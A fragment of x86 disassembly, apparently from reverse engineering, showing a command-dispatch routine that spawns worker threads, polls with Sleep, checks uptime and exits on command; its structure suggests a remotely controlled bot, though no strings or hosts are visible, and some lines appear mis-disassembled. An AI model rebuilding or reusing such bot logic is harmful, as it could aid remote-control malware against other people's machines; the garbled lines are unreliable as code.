loc_40D384: ; CODE XREF: seg000:0040A6D6�j
; seg000:0040A6EB�j
mov al, ds:byte_420082
mov [ebp+8], ebx
cmp al, bl
mov edx, offset byte_420082
jz loc_40980B
mov ecx, edx
loc_40D39B: ; CODE XREF: seg000:0040D3A3�j
inc dword ptr [ebp+8]
add ecx, 0Bh
cmp [ecx], bl
jnz short loc_40D39B
cmp al, bl
jz loc_40980B
mov [ebp+20h], edx
loc_40D3B0: ; CODE XREF: seg000:0040D66E�j
push 8
call sub_4101FF
pop ecx
mov ecx, eax
mov eax, 190h
cdq
idiv dword ptr [ebp+8]
add eax, ecx
cmp eax, 12Ch
jle short loc_40D3FF
push ecx
lea eax, [ebp-2E4h]
push offset dword_42B9FC
push eax
call sub_41050B
push ebx
lea eax, [ebp-2E4h]
push dword ptr [ebp-4]
push eax
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40E367
add esp, 20h
jmp loc_40D665
; ---------------------------------------------------------------------------
loc_40D3FF: ; CODE XREF: seg000:0040D3CA�j
or dword ptr [ebp-300h], 0FFFFFFFFh
cmp ds:dword_41FFE8, ebx
mov dword ptr [ebp-304h], 64h
mov dword ptr [ebp-318h], 5
mov dword ptr [ebp-314h], 1F4h
mov [ebp+8], ebx
jz short loc_40D470
mov eax, [ebp+20h]
mov edi, offset dword_41FFE8
lea esi, [eax-0Ah]
loc_40D43A: ; CODE XREF: seg000:0040D452�j
lea eax, [edi-28h]
push esi
push eax
call sub_410930
pop ecx
test eax, eax
pop ecx
jz short loc_40D456
inc dword ptr [ebp+8]
add edi, 3Ch
cmp [edi], ebx
jnz short loc_40D43A
jmp short loc_40D470
; ---------------------------------------------------------------------------
loc_40D456: ; CODE XREF: seg000:0040D448�j
mov eax, [ebp+8]
mov ecx, eax
mov [ebp-300h], eax
imul ecx, 3Ch
mov ecx, ds:dword_41FFE8[ecx]
mov [ebp-31Ch], ecx
loc_40D470: ; CODE XREF: seg000:0040D42D�j
; seg000:0040D454�j
cmp [ebp-31Ch], ebx
jz loc_40D679
push 10h
lea eax, [ebp+18h]
pop esi
push eax
lea eax, [ebp-0D8h]
push eax
mov [ebp+18h], esi
push dword ptr [ebp+0Ch]
call ds:dword_43073C
mov al, [ebp-9B3h]
push esi
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp-0D4h], eax
push dword ptr [ebp-0D4h]
call ds:dword_43081C
push eax
lea eax, [ebp-430h]
push eax
call sub_411D00
xor eax, eax
cmp [ebp-9B3h], bl
push 30h
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp-430h]
push eax
call sub_412000
add esp, 14h
cmp edi, ebx
mov [ebp+2Fh], bl
jle short loc_40D512
loc_40D4F0: ; CODE XREF: seg000:0040D510�j
cmp eax, ebx
jz short loc_40D512
mov byte ptr [eax], 78h
lea eax, [ebp-430h]
push 30h
push eax
call sub_412000
inc byte ptr [ebp+2Fh]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+2Fh]
cmp ecx, edi
jl short loc_40D4F0
loc_40D512: ; CODE XREF: seg000:0040D4EE�j
; seg000:0040D4F2�j
mov eax, [ebp+0Ch]
push dword ptr [ebp-98h]
mov esi, [ebp-4]
mov [ebp-320h], eax
mov eax, [ebp-8]
mov edi, 80h
mov [ebp-2F4h], eax
lea eax, [ebp-420h]
push edi
push eax
mov dword ptr [ebp-2F0h], 1
mov [ebp-2F8h], esi
call sub_410A8A
push offset dword_42F3E8
push offset dword_4230B4
call sub_410930
add esp, 14h
test eax, eax
jz short loc_40D57C
push offset dword_4230B4
lea eax, [ebp-3A0h]
push edi
push eax
call sub_410A8A
add esp, 0Ch
jmp short loc_40D582
; ---------------------------------------------------------------------------
loc_40D57C: ; CODE XREF: seg000:0040D563�j
mov [ebp-3A0h], bl
loc_40D582: ; CODE XREF: seg000:0040D57A�j
cmp [ebp-2F0h], ebx
mov eax, offset dword_42B9A8
jnz short loc_40D594
mov eax, offset dword_42B99C
loc_40D594: ; CODE XREF: seg000:0040D58D�j
push dword ptr [ebp-304h]
lea ecx, [ebp-430h]
push dword ptr [ebp-314h]
push dword ptr [ebp-318h]
push dword ptr [ebp-31Ch]
push ecx
push eax
lea eax, [ebp-2E4h]
push offset dword_42A9DC
push eax
call sub_41050B
push ebx
lea eax, [ebp-2E4h]
push 8
push eax
call sub_40FFB7
add esp, 2Ch
mov [ebp-310h], eax
lea eax, [ebp-10h]
push eax
lea eax, [ebp-430h]
push ebx
push eax
push 405723h
push ebx
push ebx
call ds:dword_41C06C ; CreateThread
mov ecx, [ebp-310h]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4358EC[ecx], eax
jz short loc_40D61E
loc_40D60C: ; CODE XREF: seg000:0040D61C�j
cmp [ebp-2ECh], ebx
jnz short loc_40D639
push 32h
call ds:dword_41C058 ; Sleep
jmp short loc_40D60C
; ---------------------------------------------------------------------------
loc_40D61E: ; CODE XREF: seg000:0040D60A�j
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
lea eax, [ebp-2E4h]
push offset dword_42B8D8
push eax
call sub_41050B
add esp, 0Ch
loc_40D639: ; CODE XREF: seg000:0040D612�j
cmp [ebp-8], ebx
jnz short loc_40D658
push ebx
lea eax, [ebp-2E4h]
push esi
push eax
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40E367
add esp, 14h
loc_40D658: ; CODE XREF: seg000:0040D63C�j
lea eax, [ebp-2E4h]
push eax
call sub_407E0E
pop ecx
loc_40D665: ; CODE XREF: seg000:0040D3FA�j
add dword ptr [ebp+20h], 0Bh
mov eax, [ebp+20h]
cmp [eax], bl
jnz loc_40D3B0
jmp loc_40980B
; ---------------------------------------------------------------------------
loc_40D679: ; CODE XREF: seg000:0040BACA�j
; seg000:0040D476�j
push offset dword_42A990
loc_40D67E: ; CODE XREF: seg000:0040B62D�j
; seg000:0040B75D�j ...
lea eax, [ebp-2E4h]
push eax
call sub_41050B
pop ecx
pop ecx
jmp loc_40B441
; ---------------------------------------------------------------------------
loc_40D691: ; CODE XREF: seg000:0040A6AC�j
; seg000:0040A6C1�j
push 4
call sub_4101FF
test eax, eax
pop ecx
jle short loc_40D6B5
lea eax, [ebp-2E4h]
push offset dword_42A95C
push eax
call sub_41050B
pop ecx
pop ecx
jmp loc_40C65C
; ---------------------------------------------------------------------------
loc_40D6B5: ; CODE XREF: seg000:0040D69B�j
mov eax, [ebp+esi-9Ch]
cmp eax, ebx
jz short loc_40D6D8
push eax
mov edi, 104h
lea eax, [ebp-804h]
push edi
push eax
call sub_410A8A
add esp, 0Ch
jmp short loc_40D6EC
; ---------------------------------------------------------------------------
loc_40D6D8: ; CODE XREF: seg000:0040D6BE�j
mov edi, 104h
lea eax, [ebp-804h]
push edi
push eax
push ebx
call near ptr 3D0000h
push es
loc_40D6EC: ; CODE XREF: seg000:0040D6D6�j
mov esi, [ebp+esi-98h]
cmp esi, ebx
jnz short loc_40D6FC
mov esi, offset byte_423068
loc_40D6FC: ; CODE XREF: seg000:0040D6F5�j
push esi
lea eax, [ebp-700h]
push edi
push eax
call sub_410A8A
mov eax, ds:dword_422FF8
push 7Fh
push dword ptr [ebp-98h]
mov [ebp-5F4h], eax
mov eax, [ebp+0Ch]
mov [ebp-5F8h], ebx
mov [ebp-808h], eax
lea eax, [ebp-5F0h]
push eax
call sub_411D00
mov eax, [ebp-4]
mov [ebp-570h], eax
mov eax, [ebp-8]
mov [ebp-56Ch], eax
lea eax, [ebp-700h]
push eax
lea eax, [ebp-804h]
push eax
lea eax, [ebp-2E4h]
push dword ptr [ebp-5F4h]
push offset dword_4202D4
push eax
call sub_41050B
push ebx
lea eax, [ebp-2E4h]
push 4
push eax
call sub_40FFB7
add esp, 38h
mov [ebp-5FCh], eax
lea eax, [ebp-10h]
push eax
lea eax, [ebp-808h]
push ebx
push eax
push offset loc_4049C2
push ebx
push ebx
call ds:dword_41C06C ; CreateThread
mov ecx, [ebp-5FCh]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4358EC[ecx], eax
jz short loc_40D7CC
loc_40D7B6: ; CODE XREF: seg000:0040D7CA�j
cmp [ebp-568h], ebx
jnz loc_40C65C
push 32h
call ds:dword_41C058 ; Sleep
jmp short loc_40D7B6
; ---------------------------------------------------------------------------
loc_40D7CC: ; CODE XREF: seg000:0040D7B4�j
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
push offset dword_42A910
jmp loc_40E0C5
; ---------------------------------------------------------------------------
loc_40D7DD: ; CODE XREF: seg000:0040A682�j
; seg000:0040A697�j
mov edi, [ebp+esi-9Ch]
cmp edi, ebx
jz short loc_40D7FC
push edi
call sub_410A7F
test eax, eax
pop ecx
jz short loc_40D7FC
push edi
call sub_410A7F
pop ecx
jmp short loc_40D801
; ---------------------------------------------------------------------------
loc_40D7FC: ; CODE XREF: seg000:0040D7E6�j
; seg000:0040D7F1�j
mov eax, ds:dword_422FFC
loc_40D801: ; CODE XREF: seg000:0040D7FA�j
mov esi, [ebp+esi-98h]
mov [ebp-584h], eax
xor eax, eax
cmp [ebp-9B0h], bl
setz al
cmp esi, ebx
mov [ebp-570h], eax
jz short loc_40D834
lea eax, [ebp-688h]
push esi
push eax
call sub_41050B
pop ecx
pop ecx
jmp short loc_40D85F
; ---------------------------------------------------------------------------
loc_40D834: ; CODE XREF: seg000:0040D821�j
lea eax, [ebp-3E8h]
push 104h
push eax
call near ptr 3D0000h
and edx, [ebx+53h]
lea eax, [ebp-0D4h]
push ebx
push eax
lea eax, [ebp-3E8h]
push eax
call sub_4121E8
add esp, 14h
loc_40D85F: ; CODE XREF: seg000:0040D832�j
lea eax, [ebp-688h]
push eax
call sub_410B60
cmp byte ptr [ebp+eax-689h], 5Ch
pop ecx
jnz short loc_40D88A
lea eax, [ebp-688h]
push eax
call sub_410B60
pop ecx
mov [ebp+eax-689h], bl
loc_40D88A: ; CODE XREF: seg000:0040D874�j
push dword ptr [ebp-98h]
mov esi, [ebp+0Ch]
lea eax, [ebp-910h]
mov [ebp-914h], esi
push 80h
push eax
call sub_410A8A
mov eax, [ebp-8]
mov edi, [ebp-4]
add esp, 0Ch
mov [ebp-574h], eax
lea eax, [ebp-688h]
mov [ebp-578h], edi
push eax
push dword ptr [ebp-584h]
push esi
call sub_407435
pop ecx
push eax
lea eax, [ebp-2E4h]
push offset dword_4201A4
push eax
call sub_41050B
push ebx
lea eax, [ebp-2E4h]
push 3
push eax
call sub_40FFB7
add esp, 20h
mov [ebp-57Ch], eax
lea eax, [ebp-10h]
push eax
lea eax, [ebp-914h]
push ebx
push eax
push offset sub_4038A7
push ebx
push ebx
call ds:dword_41C06C ; CreateThread
mov ecx, [ebp-57Ch]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4358EC[ecx], eax
jz short loc_40D93E
loc_40D92C: ; CODE XREF: seg000:0040D93C�j
cmp [ebp-568h], ebx
jnz short loc_40D959
push 32h
call ds:dword_41C058 ; Sleep
jmp short loc_40D92C
; ---------------------------------------------------------------------------
loc_40D93E: ; CODE XREF: seg000:0040D92A�j
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
push offset dword_42A8C4
loc_40D94A: ; CODE XREF: seg000:0040BFE7�j
; seg000:0040C0E1�j
lea eax, [ebp-2E4h]
push eax
call sub_41050B
add esp, 0Ch
loc_40D959: ; CODE XREF: seg000:0040BFCB�j
; seg000:0040C0C5�j ...
cmp [ebp-8], ebx
jnz loc_40B462
push ebx
push edi
loc_40D964: ; CODE XREF: seg000:0040B890�j
lea eax, [ebp-2E4h]
push eax
push dword ptr [ebp-98h]
push esi
jmp loc_40B45A
; ---------------------------------------------------------------------------
loc_40D977: ; CODE XREF: seg000:0040A658�j
; seg000:0040A66D�j
mov esi, [ebp+esi-9Ch]
cmp esi, ebx
jz short loc_40D98A
push esi
call sub_410A7F
jmp short loc_40D991
; ---------------------------------------------------------------------------
loc_40D98A: ; CODE XREF: seg000:0040D980�j
push 8
call sub_41021E
loc_40D991: ; CODE XREF: seg000:0040D988�j
cmp eax, ebx
pop ecx
jz loc_40E148
push eax
push dword ptr [ebp-4]
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_404F83
jmp loc_40DDE7
; ---------------------------------------------------------------------------
loc_40D9B1: ; CODE XREF: seg000:0040A62E�j
; seg000:0040A643�j
mov eax, ds:dword_4306CC
cmp eax, ebx
jz short loc_40D9CE
call eax
test eax, eax
jz short loc_40D9C7
push offset dword_42A88C
jmp short loc_40D9EA
; ---------------------------------------------------------------------------
loc_40D9C7: ; CODE XREF: seg000:0040D9BE�j
push offset dword_42A84C
jmp short loc_40D9EA
; ---------------------------------------------------------------------------
loc_40D9CE: ; CODE XREF: seg000:0040D9B8�j
push offset dword_42A80C
jmp short loc_40D9EA
; ---------------------------------------------------------------------------
loc_40D9D5: ; CODE XREF: seg000:0040A604�j
; seg000:0040A619�j
call sub_407357
test eax, eax
jz short loc_40D9E5
push offset dword_42A7D4
jmp short loc_40D9EA
; ---------------------------------------------------------------------------
loc_40D9E5: ; CODE XREF: seg000:0040D9DC�j
push offset dword_42A794
loc_40D9EA: ; CODE XREF: seg000:0040D9C5�j
; seg000:0040D9CC�j ...
lea eax, [ebp-2E4h]
push 200h
push eax
call sub_410A8A
jmp loc_40C89E
; ---------------------------------------------------------------------------
loc_40DA00: ; CODE XREF: seg000:0040A5DA�j
; seg000:0040A5EF�j
cmp [ebp-8], ebx
jnz short loc_40DA1F
push ebx
push dword ptr [ebp-4]
push offset dword_42A780
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40E367
add esp, 14h
loc_40DA1F: ; CODE XREF: seg000:0040DA03�j
push ebx
push dword ptr [ebp-4]
call sub_406F56
push eax
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40E367
push offset dword_42A750
jmp loc_40DCB3
; ---------------------------------------------------------------------------
loc_40DA41: ; CODE XREF: seg000:0040A529�j
; seg000:0040A53E�j
push dword ptr [ebp-8]
push dword ptr [ebp-4]
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_406977
jmp loc_40DCD4
; ---------------------------------------------------------------------------
loc_40DA5A: ; CODE XREF: seg000:0040A4FF�j
; seg000:0040A514�j
push dword ptr [ebp+esi-9Ch]
push dword ptr [ebp-4]
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_408978
jmp loc_40DCD4
; ---------------------------------------------------------------------------
loc_40DA77: ; CODE XREF: seg000:0040A4D5�j
; seg000:0040A4EA�j
or edi, 0FFFFFFFFh
call ds:dword_41C04C ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov esi, [ebp+esi-9Ch]
cmp esi, ebx
mov [ebp+8], eax
jz short loc_40DAA0
push esi
call sub_410A7F
pop ecx
mov edi, eax
loc_40DAA0: ; CODE XREF: seg000:0040DA95�j
mov eax, [ebp+8]
xor edx, edx
mov ecx, 15180h
div ecx
cmp eax, edi
jnb short loc_40DAB9
cmp edi, 0FFFFFFFFh
jnz loc_40E148
loc_40DAB9: ; CODE XREF: seg000:0040DAAE�j
push ebx
call sub_40787D
push eax
lea eax, [ebp-2E4h]
push offset dword_42A724
push eax
call sub_41050B
push ebx
lea eax, [ebp-2E4h]
push dword ptr [ebp-4]
push eax
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40E367
lea eax, [ebp-2E4h]
push eax
call sub_407E0E
loc_40DAF6: ; CODE XREF: seg000:0040BE1F�j
add esp, 28h
jmp loc_40E148
; ---------------------------------------------------------------------------
loc_40DAFE: ; CODE XREF: seg000:0040A4AB�j
; seg000:0040A4C0�j
push 1Eh
call sub_4101FF
test eax, eax
pop ecx
jle short loc_40DB32
cmp [ebp-8], ebx
jnz loc_40980B
push ebx
push dword ptr [ebp-4]
push offset dword_42A6F0
push dword ptr [ebp-98h]
loc_40DB22: ; CODE XREF: seg000:00409C19�j
push dword ptr [ebp+0Ch]
call sub_40E367
add esp, 14h
jmp loc_40980B
; ---------------------------------------------------------------------------
loc_40DB32: ; CODE XREF: seg000:0040DB08�j
push dword ptr [ebp-98h]
lea eax, [ebp-4F8h]
push 80h
push eax
call sub_410A8A
mov eax, [ebp+0Ch]
mov esi, [ebp+esi-9Ch]
mov [ebp-4FCh], eax
mov eax, [ebp-4]
mov [ebp-470h], eax
mov eax, [ebp-8]
add esp, 0Ch
cmp esi, ebx
mov [ebp-46Ch], eax
mov [ebp-474h], ebx
jz short loc_40DB93
push esi
push offset dword_42A6E8
call sub_410930
pop ecx
test eax, eax
pop ecx
jnz short loc_40DB93
mov dword ptr [ebp-474h], 1
loc_40DB93: ; CODE XREF: seg000:0040DB76�j
; seg000:0040DB87�j
lea eax, [ebp-2E4h]
push offset dword_42A6B4
push eax
call sub_41050B
push ebx
lea eax, [ebp-2E4h]
push 1Eh
push eax
call sub_40FFB7
add esp, 14h
mov [ebp-478h], eax
lea eax, [ebp-10h]
push eax
lea eax, [ebp-4FCh]
push ebx
push eax
push offset sub_40F59E
push ebx
push ebx
call ds:dword_41C06C ; CreateThread
mov ecx, [ebp-478h]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4358EC[ecx], eax
jz short loc_40DC01
loc_40DBEB: ; CODE XREF: seg000:0040DBFF�j
cmp [ebp-468h], ebx
jnz loc_40B462
push 32h
call ds:dword_41C058 ; Sleep
jmp short loc_40DBEB
; ---------------------------------------------------------------------------
loc_40DC01: ; CODE XREF: seg000:0040DBE9�j
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
lea eax, [ebp-2E4h]
push offset dword_42A664
push eax
call sub_41050B
add esp, 0Ch
jmp loc_40B462
; ---------------------------------------------------------------------------
loc_40DC21: ; CODE XREF: seg000:0040A481�j
; seg000:0040A496�j
cmp [ebp-8], ebx
jnz short loc_40DC40
push ebx
push dword ptr [ebp-4]
push offset dword_42A638
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40E367
add esp, 14h
loc_40DC40: ; CODE XREF: seg000:0040DC24�j
push dword ptr [ebp+0Ch]
call ds:dword_430828
call ds:dword_430700
call loc_4070D9
push ebx
call ds:dword_41C0F8 ; ExitProcess
loc_40DC5B: ; CODE XREF: seg000:0040A457�j
; seg000:0040A46C�j
push ebx
lea eax, [ebp-2E4h]
push dword ptr [ebp-4]
push dword ptr [ebp+0Ch]
push eax
call sub_40799C
pop ecx
pop ecx
push eax
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40E367
push offset dword_42A60C
jmp short loc_40DCB3
; ---------------------------------------------------------------------------
loc_40DC86: ; CODE XREF: seg000:0040A42D�j
; seg000:0040A442�j
push ebx
lea eax, [ebp-2E4h]
push dword ptr [ebp-4]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+24h]
push eax
call sub_407C50
add esp, 0Ch
push eax
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40E367
push offset dword_42A5E0
loc_40DCB3: ; CODE XREF: seg000:0040DA3C�j
; seg000:0040DC84�j
call sub_407E0E
loc_40DCB8: ; CODE XREF: seg000:0040CB2F�j
add esp, 18h
jmp loc_40E148
; ---------------------------------------------------------------------------
loc_40DCC0: ; CODE XREF: seg000:0040A403�j
; seg000:0040A418�j
push dword ptr [ebp-8]
push dword ptr [ebp-4]
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_407EAE
loc_40DCD4: ; CODE XREF: seg000:00409755�j
; seg000:0040DA55�j ...
add esp, 10h
jmp loc_40980B
; ---------------------------------------------------------------------------
loc_40DCDC: ; CODE XREF: seg000:0040A3D9�j
; seg000:0040A3EE�j
cmp [ebp-0Ch], ebx
mov [ebp-374h], bl
jz short loc_40DD1B
mov esi, [ebp+esi-9Ch]
cmp esi, ebx
jz short loc_40DD1B
push esi
push dword ptr [ebp-0Ch]
call sub_410AE0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40DD1B
push eax
push offset dword_41F970
lea eax, [ebp-374h]
push 80h
push eax
call sub_410A8A
add esp, 10h
loc_40DD1B: ; CODE XREF: seg000:0040DCE5�j
; seg000:0040DCF0�j ...
push dword ptr [ebp-98h]
lea eax, [ebp-3F4h]
push 80h
push eax
call sub_410A8A
mov eax, [ebp+0Ch]
push offset dword_42A5B4
mov [ebp-3F8h], eax
mov eax, [ebp-4]
mov [ebp-2F0h], eax
mov eax, [ebp-8]
mov [ebp-2ECh], eax
lea eax, [ebp-2E4h]
push eax
call sub_41050B
push ebx
lea eax, [ebp-2E4h]
push 1Ch
push eax
call sub_40FFB7
add esp, 20h
mov [ebp-2F4h], eax
lea eax, [ebp-10h]
push eax
lea eax, [ebp-3F8h]
push ebx
push eax
push offset sub_407EEE
push ebx
push ebx
call ds:dword_41C06C ; CreateThread
mov ecx, [ebp-2F4h]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4358EC[ecx], eax
jz short loc_40DDBB
loc_40DDA5: ; CODE XREF: seg000:0040DDB9�j
cmp [ebp-2E8h], ebx
jnz loc_40980B
push 32h
call ds:dword_41C058 ; Sleep
jmp short loc_40DDA5
; ---------------------------------------------------------------------------
loc_40DDBB: ; CODE XREF: seg000:0040DDA3�j
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
push offset dword_42A568
jmp loc_40E2CF
; ---------------------------------------------------------------------------
loc_40DDCC: ; CODE XREF: seg000:0040A3AF�j
; seg000:0040A3C4�j
push dword ptr [ebp-4]
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_407D96
push offset dword_42A53C
call sub_407E0E
loc_40DDE7: ; CODE XREF: seg000:0040D9AC�j
add esp, 10h
jmp loc_40E148
; ---------------------------------------------------------------------------
loc_40DDEF: ; CODE XREF: seg000:0040A385�j
; seg000:0040A39A�j
push dword ptr [ebp-98h]
lea eax, [ebp-4F8h]
push 80h
push eax
call sub_410A8A
mov eax, [ebp+0Ch]
mov esi, [ebp+esi-9Ch]
mov [ebp-4FCh], eax
mov eax, [ebp-4]
mov [ebp-470h], eax
mov eax, [ebp-8]
add esp, 0Ch
cmp esi, ebx
mov [ebp-46Ch], eax
jz short loc_40DE49
push offset dword_42A538
push esi
call sub_410930
neg eax
sbb eax, eax
pop ecx
inc eax
pop ecx
mov [ebp-474h], eax
jmp short loc_40DE4F
; ---------------------------------------------------------------------------
loc_40DE49: ; CODE XREF: seg000:0040DE2D�j
mov [ebp-474h], ebx
loc_40DE4F: ; CODE XREF: seg000:0040DE47�j
lea eax, [ebp-2E4h]
push offset dword_42A508
push eax
call sub_41050B
push ebx
lea eax, [ebp-2E4h]
push 1Fh
push eax
call sub_40FFB7
add esp, 14h
mov [ebp-478h], eax
lea eax, [ebp-10h]
push eax
lea eax, [ebp-4FCh]
push ebx
push eax
push offset word_410022
push ebx
push ebx
call ds:dword_41C06C ; CreateThread
mov ecx, [ebp-478h]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4358EC[ecx], eax
jz short loc_40DEB9
loc_40DEA7: ; CODE XREF: seg000:0040DEB7�j
cmp [ebp-468h], ebx
jnz short loc_40DED4
push 32h
call ds:dword_41C058 ; Sleep
jmp short loc_40DEA7
; ---------------------------------------------------------------------------
loc_40DEB9: ; CODE XREF: seg000:0040DEA5�j
call ds:dword_41C068 ; RtlGetLastWin32Error
push eax
lea eax, [ebp-2E4h]
push offset dword_42A4BC
push eax
call sub_41050B
add esp, 0Ch
loc_40DED4: ; CODE XREF: seg000:0040CE41�j
; seg000:0040CE59�j ...
lea eax, [ebp-2E4h]
push eax
loc_40DEDB: ; CODE XREF: seg000:0040A5C6�j
call sub_407E0E
pop ecx
jmp loc_40E148
; ---------------------------------------------------------------------------
loc_40DEE6: ; CODE XREF: seg000:0040A309�j
; seg000:0040A31E�j
push offset dword_423018
lea eax, [ebp-2E4h]
push offset dword_42A490
push eax
call sub_41050B
push ebx
lea eax, [ebp-2E4h]
push dword ptr [ebp-4]
push eax
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40E367
add esp, 20h
jmp loc_40C8D7
; ---------------------------------------------------------------------------
loc_40DF1D: ; CODE XREF: seg000:0040A2DF�j
; seg000:0040A2F4�j
push ds:dword_45EBC8
call sub_40787D
push eax
lea eax, [ebp-2E4h]
push offset dword_42A450
push eax
call sub_41050B
push ebx
lea eax, [ebp-2E4h]
push dword ptr [ebp-4]
push eax
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_40E367
add esp, 24h
jmp loc_40C8D7
; ---------------------------------------------------------------------------
loc_40DF5B: ; CODE XREF: seg000:0040A2B5�j
; seg000:0040A2CA�j
mov esi, [ebp+esi-9Ch]
cmp esi, ebx
jz short loc_40DF8D
cmp [ebp-0Ch], ebx
jz short loc_40DF9C
push esi
push dword ptr [ebp-0Ch]
call sub_410AE0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40DF9C
push eax
push offset dword_42A444
push dword ptr [ebp+0Ch]
call sub_40E321
add esp, 0Ch
jmp short loc_40DF9C
; ---------------------------------------------------------------------------
loc_40DF8D: ; CODE XREF: seg000:0040DF64�j
push offset dword_42AC18
push dword ptr [ebp+0Ch]
call sub_40E321
pop ecx
pop ecx
loc_40DF9C: ; CODE XREF: seg000:0040DF69�j
; seg000:0040DF78�j ...
push 0FFFFFFFEh
jmp loc_40980D
; ---------------------------------------------------------------------------
loc_40DFA3: ; CODE XREF: seg000:0040A28B�j
; seg000:0040A2A0�j
push offset dword_42A42C
push dword ptr [ebp+0Ch]
call sub_40E321
push offset dword_42A3FC
call sub_407E0E
add esp, 0Ch
or eax, 0FFFFFFFFh
jmp loc_40980E
; ---------------------------------------------------------------------------
loc_40DFC5: ; CODE XREF: seg000:0040A261�j
; seg000:0040A276�j
push offset dword_42A3E4
push dword ptr [ebp+0Ch]
call sub_40E321
push offset dword_42A3B8
call sub_407E0E
add esp, 0Ch
xor eax, eax
jmp loc_40980E
; ---------------------------------------------------------------------------
loc_40DFE6: ; CODE XREF: seg000:0040A237�j
; seg000:0040A24C�j
push dword ptr [ebp-4]
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_404EB9
loc_40DFF7: ; CODE XREF: seg000:0040CA9B�j
add esp, 0Ch
jmp loc_40E148
; ---------------------------------------------------------------------------
loc_40DFFF: ; CODE XREF: seg000:0040A192�j
; seg000:0040A1A7�j
push dword ptr [ebp+esi-9Ch]
push 1Eh
push offset dword_42A3A8
push offset dword_42A39C
loc_40E012: ; CODE XREF: seg000:0040A036�j
; seg000:0040A05F�j ...
push dword ptr [ebp-8]
push dword ptr [ebp-4]
push dword ptr [ebp-98h]
push dword ptr [ebp+0Ch]
call sub_410245
add esp, 20h
jmp loc_40980B
; ---------------------------------------------------------------------------
loc_40E02E: ; CODE XREF: seg000:00409FF7�j
; seg000:0040A00C�j
mov esi, [ebp+esi-9Ch]
cmp esi, ebx
jz short loc_40E088
push esi
call sub_410A7F
cmp eax, ebx
pop ecx
jl short loc_40E080
cmp eax, 2
jge short loc_40E080
mov edx, [ebp+20h]
mov ecx, eax
shl ecx, 7
cmp [ecx+edx], bl
lea esi, [ecx+edx]
jz short loc_40E078
lea eax, [esi+1]
push eax
lea eax, [ebp-2E4h]
push offset dword_42CB38
push eax
call sub_41050B
add esp, 0Ch
mov [esi], bl
jmp loc_40C65C
; ---------------------------------------------------------------------------
loc_40E078: ; CODE XREF: seg000:0040E057�j
push eax
push offset dword_42A35C
jmp short loc_40E0C5
; ---------------------------------------------------------------------------
loc_40E080: ; CODE XREF: seg000:0040E042�j
; seg000:0040E047�j
push eax
push offset dword_42A31C
jmp short loc_40E0C5
; ---------------------------------------------------------------------------
loc_40E088: ; CODE XREF: seg000:0040E037�j
mov edi, [ebp+20h]
xor esi, esi
loc_40E08D: ; CODE XREF: seg000:0040E0A9�j
push dword ptr [ebp-0A0h]
push edi
call sub_410930
pop ecx
test eax, eax
pop ecx
jz short loc_40E0B0
inc esi
add edi, 80h
cmp esi, 2
jl short loc_40E08D
jmp loc_40C65C
; ---------------------------------------------------------------------------
loc_40E0B0: ; CODE XREF: seg000:0040E09D�j
mov eax, [ebp+20h]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp-0C4h]
push eax
push offset dword_42CB38
loc_40E0C5: ; CODE XREF: seg000:0040D13E�j
; seg000:0040D7D8�j ...
lea eax, [ebp-2E4h]
push eax
call sub_41050B
add esp, 0Ch
jmp loc_40C65C
; ---------------------------------------------------------------------------
loc_40E0D9: ; CODE XREF: seg000:00409FCD�j
; seg000:00409FE2�j
push dword ptr [ebp-9Ch]
push offset dword_42CA90
call sub_410930
pop ecx
test eax, eax
pop ecx
jz short loc_40E148
call sub_410180
push ebx
call ds:dword_41C0F8 ; ExitProcess
loc_40E0FB: ; CODE XREF: seg000:00409FA3�j
; seg000:00409FB8�j
push dword ptr [ebp+esi-9Ch]
xor eax, eax
cmp [ebp-9A4h], bl
setnz al
push eax
lea eax, [ebp-464h]
push ds:dword_423014
push eax
call sub_40FA4E
lea eax, [ebp-464h]
push eax
push offset dword_42CB74
push dword ptr [ebp+0Ch]
call sub_40E321
lea eax, [ebp-464h]
push eax
push offset dword_42A2E4
call sub_407E82
loc_40E145: ; CODE XREF: seg000:0040B5CA�j
add esp, 24h
loc_40E148: ; CODE XREF: seg000:004099D3�j
; seg000:004099DF�j ...
mov eax, [ebp+2Ch]
jmp loc_40980E
; ---------------------------------------------------------------------------
loc_40E150: ; CODE XREF: seg000:00409A62�j
; seg000:00409A77�j
mov esi, [ebp+esi-9Ch]
cmp esi, ebx
mov [ebp+8], esi
jz loc_40980B
cmp [ebp-0A8h], ebx
jnz loc_40980B
push offset dword_42625C
push dword ptr [ebp-0A0h]
call sub_411C60
mov esi, eax
